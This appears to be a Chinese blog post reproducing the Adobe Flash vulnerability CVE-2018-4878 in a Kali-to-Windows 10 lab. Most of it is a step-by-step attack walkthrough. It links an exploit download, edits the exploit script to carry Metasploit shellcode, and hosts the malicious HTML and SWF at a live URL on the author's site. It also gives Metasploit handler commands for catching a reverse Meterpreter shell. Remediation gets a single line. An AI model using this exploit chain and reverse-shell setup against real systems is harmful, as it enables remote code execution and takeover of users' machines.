Menu

CVE-2018-4878 Flash 0day漏洞复现

0 Comment

0×01 前言

2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878),攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被getshell,直到2018年2月5号,Adboe才发布补丁来修复此0 day漏洞

从Adobe公告致谢来看,这个漏洞的野外攻击样本最早是由韩国计算机应急响应小组(KR-CERT)2017年就发现的,而KR-CERT也表示,来自朝鲜的黑客组织已经成功利用这个0Day 漏洞发起攻击

0×02 漏洞复现

环境:

攻击机:kali

靶机:win10

 

下载CVE-2018-4878的脚本

http://wget https://raw.githubusercontent.com/backlion/demo/master/CVE-2018-4878.rar

解压文件,rar文件在linux下不好解压,我也就放mac里先解压了再放进去。

这里面主要利用的是CVE-2018-4878.py

图1

我们需要对cve-2018-4878.py进行修改,原作者将代码中的stageless变量改成了true,正确的应该改成:stageless = False

附上原作者的exp地址:https://github.com/anbai-inc/CVE-2018-4878.git

然后在kali下生成msf的shellcode替换上面的👆的shellcode(图1)

此shellcode每个人的都不一样,因为lhost和lport设置不一样

用上面的shellcode.txt替换py文件原来弹计算器的shellcode

在kal下执行cve-2018-4878.py

从报的错当中可以看到exp中设置的文件路径需要放在/opt文件下

改正之后

执行之后会生成一个新的index.html和一个swf文件,我们所需要的恶意文件也就是这两个文件

简单的演示就是把这两个文件拷贝到win10上,在同一目录下点击index.html就可执行反弹shell,这里的话我把这两个恶意文件放在我的博客上的一个目录下,访问此目录默认访问index.html,在win10上访问此网站

http://www.hackpw.com/muma

再访问之前需要在kali上设置监听端口,准备接收反弹的shell

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.241
msf exploit(handler) > set lport 443
msf exploit(handler) > exploit

当靶机访问恶意文件的时候,触发反弹shell

0x04 漏洞修复

通过官方网站升级到最新版本

发表评论

电子邮件地址不会被公开。 必填项已用*标注